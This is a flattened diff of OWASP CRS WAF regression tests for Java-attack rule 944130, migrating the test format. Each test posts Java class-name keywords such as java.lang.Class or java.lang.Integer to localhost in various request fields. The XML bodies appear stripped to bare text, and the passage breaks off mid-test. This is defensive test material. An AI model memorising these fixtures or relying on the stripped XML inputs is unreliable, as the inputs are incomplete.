"POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log: + expect_ids: [944130] + - test_id: 272 desc: "Nested XML element value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-273 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log: + expect_ids: [944130] + - test_id: 273 desc: "Content-Type text/plain includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-274 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log: + expect_ids: [944130] + - test_id: 274 desc: "Content-Type application/json arg value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Class\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-275 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Class\"}" + output: + log: + expect_ids: [944130] + - test_id: 275 desc: "Content-Type application/json arg name includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Class\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-276 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Class\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 276 desc: "Argument test includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-277 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log: + expect_ids: [944130] + - test_id: 277 desc: "Argument name includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Integer=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-278 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Integer=test" + output: + log: + expect_ids: [944130] + - test_id: 278 desc: "Cookie test includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Integer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-279 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Integer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 279 desc: "Cookie name includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Integer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-280 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Integer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 280 desc: "Request header test includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Integer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-281 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Integer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 281 desc: "XML attribute value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-282 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 282 desc: "XML element value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-283 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log: + expect_ids: [944130] + - test_id: 283 desc: "Nested XML element value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-284 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log: + expect_ids: [944130] + - test_id: 284 desc: "Content-Type text/plain includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Integer" - output: - log_contains: "id \"944130\"" - - test_title: 944130-285 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log: + expect_ids: [944130] + - test_id: 285 desc: "Content-Type application/json arg value includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Integer\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-286 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Integer\"}" + output: + log: + expect_ids: [944130] + - test_id: 286 desc: "Content-Type application/json arg name includes keyword java.lang.Integer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Integer\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-287 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Integer\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 287 desc: "Argument test includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-288 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log: + expect_ids: [944130] + - test_id: 288 desc: "Argument name includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Number=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-289 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Number=test" + output: + log: + expect_ids: [944130] + - test_id: 289 desc: "Cookie test includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Number - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-290 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Number + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 290 desc: "Cookie name includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Number=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-291 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Number=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 291 desc: "Request header test includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Number - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-292 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Number + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 292 desc: "XML attribute value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-293 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 293 desc: "XML element value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-294 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log: + expect_ids: [944130] + - test_id: 294 desc: "Nested XML element value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-295 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Number" + output: + log: + expect_ids: [944130] + - test_id: 295 desc: "Content-Type text/plain includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Number" - output: - log_contains: "id \"944130\"" - - test_title: 944130-296 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Number" + output: + log: + expect_ids: [944130] + - test_id: 296 desc: "Content-Type application/json arg value includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Number\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-297 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Number\"}" + output: + log: + expect_ids: [944130] + - test_id: 297 desc: "Content-Type application/json arg name includes keyword java.lang.Number" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.Number\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-298 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.Number\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 298 desc: "Argument test includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Object" - output: - log_contains: "id \"944130\"" - - test_title: 944130-299 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Object" + output: + log: + expect_ids: [944130] + - test_id: 299 desc: "Argument name includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Object=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-300 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Object=test" + output: + log: + expect_ids: [944130] + - test_id: 300 desc: "Cookie test includes keyword java.lang.Object" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 